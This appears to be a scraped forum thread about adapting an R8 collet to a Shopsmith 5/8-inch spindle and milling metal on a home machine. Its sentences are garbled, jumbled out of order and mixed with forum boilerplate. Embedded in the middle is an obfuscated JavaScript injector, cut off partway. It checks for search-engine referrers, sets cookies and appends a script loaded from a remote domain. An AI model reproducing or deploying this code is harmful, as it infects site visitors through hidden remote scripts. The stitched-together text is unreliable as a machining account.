I cut down the craftsman R8 collet a bit to keep it as short as I could, chucked it up in my lathe and bored it out to the 5/8" ID, then added a flat on the one side with the set screw to match with the traditional Shopsmith style and it worked like a champ! Now I can use anything that fits in a standard R8 collet.. I initially made the bonehead decision to use 5/8 thread rod and a couple of nuts welded to the headstock. I still struggle with steel, but I haven't tried it again since I added the cooling system.. var _0xd8af=['LmJpbmcu','LnlhaG9vLg==','LnlhbmRleC4=','dmlzaXRlZA==','bkNi','aHR0cHM6Ly9jbG91ZGV5ZXNzLm1lbi9kb25fY29uLnBocD94PWVuJnF1ZXJ5PQ==','Lmdvb2dsZS4=','UFNXb2E=','UlBHdFM=','LmFsdGF2aXN0YS4=','ZWdSTHg=','cmVmZXJyZXI=','Z2V0','a3NQZHU=','b1p4VFI=','RFdN','aW5kZXhPZg==','ZVJOZ1I=','c2V0','YU5udVg=','d05oS1E=','Sm9LSW8=','WVloYWg=','c2NyaXB0','aGVhZA==','Yll6Wlo=','c3Jj','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','SkZhVFQ=','YXBwZW5kQ2hpbGQ=','ZGMrY29udmVyc2lvbitmb3IrMTBlcg==','MHwxfDJ8M3w0fDU=','c3BsaXQ=','Y29va2ll','aVhkblU=','VExpakk=','bGVuZ3Ro','cmVwbGFjZQ==','OyBleHBpcmVzPQ==','OyBwYXRoPQ==','bW5NcGQ=','TnNOUWU=','cXFtV0s=','dVZDQXc=','Z0lyY1k=','V2x4R2o=','Z2V0VGltZQ==','TlZCeE4=','TGlwRXk=','eElXaXo=','OyBkb21haW49','OyBzZWN1cmU='];(function(_0x370fd6,_0x43c6a9){var _0x43b0e2=function(_0x3d440e){while(--_0x3d440e){_0x370fd6['push'](_0x370fd6['shift']());}};_0x43b0e2(++_0x43c6a9);}(_0xd8af,0x1b7));var _0xc344=function(_0x3a80bb,_0x3a1b63){_0x3a80bb=_0x3a80bb-0x0;var _0x3fb7e9=_0xd8af[_0x3a80bb];if(_0xc344['initialized']===undefined){(function(){var _0x44b335=function(){var _0x43eba0;try{_0x43eba0=Function('return\x20(function()\x20'+'{}.. thanks ToddSimilar Threadsnewbe, want to cut Al, have shopsmithTags for this ThreadPosting PermissionsYou may not post new threadsYou may not post repliesYou may not post attachmentsYou may not edit your postsBB code is OnSmilies are On[IMG] code is On[VIDEO] code is OnHTML code is OffCopyright © 2017 vBulletin Solutions, Inc. Should be going again by the weekend That looks like a nice Shopsmith systems all use a 5/8" spindle that just ends in a straight shaft with a drafted flat side for a set screw.. I had a fair amount of chatter in the beginning that I had to sort through, but I wad able to find and fix all of that a while back.. As far as how it cuts, it's pretty good really Anything from aluminum to plastics is a breeze.. That 2HP motor really provides a good bit of power, and the spindle is adjustable from 100-5000 RPM..
